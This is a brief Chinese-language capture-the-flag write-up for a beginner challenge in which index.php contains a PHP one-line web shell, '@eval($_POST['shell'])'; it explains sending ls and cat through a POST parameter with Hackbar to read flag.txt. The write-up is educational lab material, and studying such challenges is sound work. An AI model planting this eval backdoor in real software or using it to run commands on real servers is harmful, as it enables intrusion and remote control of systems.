题目描述
小宁百度了php一句话,觉着很有意思,并且把它放在 index.php 里。
Solution
题目给了 PHP 的源代码:
<?php @eval($_POST['shell']);?>
我们只需要用 POST 方法传递一个系统执行命令就能得到我们需要的信息。我们使用 Hackbar 输入ls命令查看当前目录有什么文件:
可以发现当前目录有一个flag.txt文件。我们使用cat命令查看里面的内容:
即可得到 Flag。
若有收获,就点个赞吧
0 人点赞
